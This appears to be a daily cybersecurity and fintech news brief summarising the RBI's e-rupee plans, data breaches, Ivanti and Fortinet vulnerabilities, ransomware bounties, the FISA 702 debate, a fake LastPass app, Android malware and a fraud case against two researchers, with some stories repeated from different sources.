Daily Brief

The Reserve Bank of India (RBI) intends to make its digital currency, the e-rupee, programmable and usable offline. The current Central Bank Digital Currency (CBDC) retail pilot, launched in late 2022, supports person-to-person and person-to-merchant transactions. Programmability will allow for transactions to be designated for specific purposes, aiding in payment transparency and usage control. Offline functionality aims to cater to areas with limited internet connectivity, which is a significant concern in remote and mountainous regions of India. Future pilot programs will gradually introduce these new features, with potential applications for government payments and business expenses. RBI plans to create a framework for authenticated digital payment transactions, considering additional factors beyond SMS-based OTPs. These initiatives are positioned as part of India's broader economic development strategy, which includes enhancing digital infrastructure and payment technologies. India is also considering revising international agreements to tax digital goods, aiming to gain tariff revenue and improve trade competitiveness.

A crime gang, referred to as "ResumeLooters," executed cyber attacks on Asian job boards and retailer websites, resulting in the theft of over two million personal records. Group-IB, an international cybersecurity company based in Singapore, identified the attacks, which predominantly used SQL injection and Cross-Site Scripting (XSS) to compromise databases. The compromised data includes email addresses, names, phone numbers, dates of birth, and employment histories, with the attacks starting in January of the year and continuing for at least two months. Despite the goal of stealing admin credentials, Group-IB found no evidence that ResumeLooters succeeded in this particular endeavor. The majority of affected victims were located in the APAC region, with India experiencing the highest number of compromised sites. Evidence of penetration testing tools and stolen data was discovered on a malicious server linked to the group, indicating attempts at deeper network penetration and data theft. Group-IB traced the attackers' activity back to two Chinese-language Telegram accounts, suggesting that the threat actors may originate from China.

Ivanti has reported a high-severity authentication bypass vulnerability, designated as CVE-2024-22024, affecting their security products. The vulnerability scores 8.3/10 on the CVSS scale and could allow unrestricted access to certain resources without authentication. Affected products include Ivanti Connect Secure, Policy Secure, and ZTA gateways, specifically in the SAML component due to an XXE issue. The flaw was identified during an ongoing internal review that has unveiled multiple security issues in Ivanti products this year. Ivanti has released patches for various versions of the affected products to address this vulnerability. The company notes there is no current evidence of active exploitation but urges users to update promptly due to recent abuse of other Ivanti vulnerabilities.

The U.S. government has placed a $15 million bounty for information on Hive ransomware gang members. This reward is aimed at identifying those in key leadership positions and aiding in the arrest and conviction of individuals involved in Hive ransomware activities. The FBI, in collaboration with international law enforcement, previously disrupted Hive's operations and provided decryption keys to save victims $130 million in ransom payments. The State Department’s reward includes the possibility that Hive members may be operating under the guidance of a foreign government. Despite take-down efforts, cybercriminals continue to profit substantially, with ransomware attacks amassing over $1 billion in cryptocurrency payments last year. Chainalysis attributes a significant decline in ransom payments in 2022 to the Hive operation, estimating at least $210.4 million in prevented ransomware payments.

FBI argues to maintain its warrantless surveillance powers under FISA Section 702, claiming it's essential to counteract Chinese hacking threat. FBI Director Christopher Wray emphasizes the crucial role of Section 702 in preemptively notifying a US transportation hub of a Chinese intrusion. Privacy advocates and some lawmakers push for reforms to Section 702, arguing it leads to warrantless surveillance of US citizens and abuse of power. Current debate focuses on whether to reauthorize Section 702 without changes, or require warrants for searches involving US persons' data. Despite FBI's contention that warrant requirements would hinder operations, critics note there's little evidence of its cyber value and advocate for privacy rights protections. Some proposed bills aim to reform Section 702, with protections including warrant requirements, except in specific circumstances involving national security. The FBI's recent disruption of the Chinese-initiated Volt Typhoon botnet, which involved warrants, is cited as an example against the claimed necessity for warrantless searches. Without significant reforms, the Electronic Frontier Foundation and others argue Section 702 has become an overreaching domestic spying tool and should be allowed to expire.

Fortinet has discovered a critical remote code execution (RCE) vulnerability in their FortiOS SSL VPN, potentially already exploited by attackers. The vulnerability, identified as CVE-2024-21762, allows unauthenticated attackers to remotely execute code through malicious requests. Fortinet has issued a 9.6 severity rating for this vulnerability and advises users to upgrade to a patched version immediately to secure their systems. As a temporary mitigation, disabling SSL VPN on FortiOS devices can help protect against this flaw if immediate patching is not possible. No specifics have been provided about the nature of the exploitation or the identifying party for this vulnerability. Other related flaws were disclosed, including a critical CVE-2024-23113 and two medium-severity CVEs, though they are not reported to be currently exploited. Fortinet's previous disclosures include an attack by the Chinese state-sponsored threat group Volt Typhoon, utilizing another set of FortiOS vulnerabilities. Organizations using Fortinet's products are urged to prioritize updates due to the high risk of targeted attacks leveraging these security weaknesses.

A fraudulent LastPass app developed by an entity named Parvati Patel was identified in the iOS App Store. LastPass' security and legal teams took action to have the malicious app removed by contacting Apple. The fake app, which attempted to impersonate the legitimate LastPass service, aimed to deceive users and potentially steal their data. Despite Apple's strict approval process and guidelines against impersonation, the rogue app circumvented the safeguards. LastPass is engaging with Apple to comprehend how the counterfeit application passed through Apple's usually rigorous security checks. The fake LastPass app contained obvious signs of fraud, such as misspellings and incorrect developer information, highlighting the need for user vigilance. The incident underscores the persistent challenge of ensuring app store security and the importance for users to scrutinize app details before downloading.

Hyundai Motor Europe was hit by a ransomware attack by the Black Basta group, compromising data integrity. Initially, Hyundai only reported "IT issues" when queried by BleepingComputer, later confirming the cyberattack. The company is actively investigating the unauthorized network access and working with cybersecurity and legal experts. Threat actors claim to have stolen 3 TB of corporate data affecting multiple departments, raising concerns about sensitive information leaks. Black Basta, linked to the notorious Conti operation, has been active since April 2022 and is known for double-extortion attacks and substantial ransom revenues. Hyundai previously faced a data breach in April 2023 and had its Hyundai MEA's X account hacked recently. Relevant authorities have been notified, emphasizing Hyundai's commitment to customer, employee, investor, and partner security.

A new authentication bypass vulnerability in Ivanti's Connect Secure, Policy Secure, and ZTA gateways poses a serious security threat requiring immediate patching. The flaw, identified as CVE-2024-22024, arises from an XML eXternal Entities (XXE) weakness in the gateways' SAML component, permitting attackers access to restricted resources without user interaction. Ivanti reports no current exploitations but emphasizes the critical need for immediate action to protect against potential attacks. Over 20,000 Internet-connected ICS VPN gateways are at risk, with compromised Ivanti Connect Secure VPN devices being actively monitored, nearly 250 of which were compromised as of February 7. Security patches for affected products were released on January 31, and Ivanti has provided interim mitigation steps for those still awaiting updates. Ivanti recommends a factory reset of all vulnerable appliances before patching to deter attacker persistence through upgrades. Following the detection of mass exploitation by various threat actors, CISA mandated that U.S. federal agencies disconnect vulnerable Ivanti VPN appliances within 48 hours.

A new variant of XLoader Android malware now runs automatically without user interaction after installation. The XLoader malware, attributed to threat actor 'Roaming Mantis,' targets users worldwide, including the U.S., U.K., and parts of Europe and Asia. The malware is spread via SMS with URLs leading to a malicious APK, often disguised as the legitimate Chrome web browser. McAfee researchers have reported the auto-execution technique to Google, and mitigations are being developed for future Android versions. Roaming Mantis uses Unicode and app impersonation to trick users into granting extensive permissions, which can lead to phishing and theft of sensitive information. Attackers utilize custom phishing attacks via notification channels, with phishing content extracted from Pinterest profiles to evade traditional security detection. The new XLoader variant can execute 20 different commands from its C2 server, indicating a sophisticated and adaptable threat. McAfee advises users to install security products capable of detecting and eradicating such threats based on known indicators.

The U.S. State Department is offering up to $10 million for information leading to Hive ransomware gang leaders. Hive is responsible for extorting $100 million from over 1,300 companies across more than 80 countries between June 2021 and November 2022. Additional rewards up to $5 million are available for information resulting in the arrest of individuals involved with Hive ransomware activities. Previous rewards of up to $15 million have been offered for other ransomware operations like Clop and Conti. The rewards are provided through the Transnational Organized Crime Rewards Program, which has paid over $135 million for tips since 1986. Law enforcement infiltrated Hive's network in July 2022, assisting victims and preventing $130 million in ransom payments. Agents provided over 300 decryption keys to Hive victims and shared intelligence gathered from Hive's communication records, malware file hashes, and affiliate information. Hive is known for its indiscriminate attacks, including on critical sectors like healthcare and emergency services.

Raspberry Robin malware operators are suspected of buying exploits to conduct faster cyberattacks. The group previously used exploits for vulnerabilities up to 12 months old but now uses recently disclosed ones. Check Point Research observed a strikingly quick adoption of vulnerabilities, some less than a month old, like CVE-2023-36802. Exploits were used before or shortly after public disclosure, with one being identified as a zero-day sold on the dark web. Analysis suggests that the Raspberry Robin team likely acquires exploits from sophisticated developers rather than developing in-house. The malware includes upgraded features for anti-evasion, survival after system shutdowns, and enhancements in communication and lateral movement. Raspberry Robin is linked with major criminal groups and is key in cybercriminal activities, being one of three loaders responsible for 80% of cyberattacks in a period of 2023.

A counterfeit LastPass app named 'LassPass' has been discovered on the Apple App Store, potentially designed to phish users' credentials. The fake app mimics the genuine LastPass in name, iconography, and user interface but is published under 'Parvati Patel' and has minimal reviews warning of its nature. As LastPass is a secure repository for sensitive information, the fraudulent app may pose a significant risk for credential theft. LastPass has issued a warning on their website about the deceptive app, providing URLs to the legitimate app for customer verification. Despite Apple's rigorous app review process, the counterfeit app has slipped through, raising questions about the efficacy of the review system. The presence of another app by the same developer on the App Store opens the possibility of their account being compromised. Users are advised to uninstall the fake LastPass app immediately, change their LastPass password, and consider resetting all passwords stored in their vault. At the time of the report, Apple had not yet responded to inquiries regarding the fake app, which remains available on the App Store.

Two French healthcare payment service providers, Viamedis and Almerys, experienced significant data breaches. Over 33 million individuals in France are affected, with sensitive data like social security numbers and insurance details exposed. No financial information was leaked according to Viamedis, which suggests bank details, email addresses, and phone numbers remain secure. Viamedis serves 20 million people via 84 health organizations, yet the exact number of affected individuals is still under investigation. The French data protection authority, CNIL, confirmed both breaches and highlighted the heightened risk of phishing, identity theft, and insurance fraud. CNIL is ensuring that both companies comply with GDPR obligations by directly informing those impacted by the breach. An investigation by CNIL is underway to assess the adequacy of the security measures in place and the companies' adherence to GDPR.

Two cybersecurity researchers, Noah Roskin-Frazee and Keith Latteri, are facing charges for defrauding an unnamed company, likely Apple, of $2.5 million. They are accused of ordering gift cards and hardware after gaining access through a third-party contractor's systems and selling these items to third parties. The pair allegedly exploited a password reset tool to compromise accounts, then used those accounts to access the company's VPN and remote desktops in India and Costa Rica. They used their access to manipulate Apple's Toolbox and Jamf MDM platforms for placing and amending orders, setting product prices to zero. They utilized transshipment companies to conceal their identities and ship fraudulently obtained products. One of the accused, Roskin-Frazee, was previously acknowledged by Apple for reporting bugs, highlighting the complexity of his dual status as a legitimate researcher and an alleged criminal. Requests for comment from Apple and the defense lawyers were not immediately answered.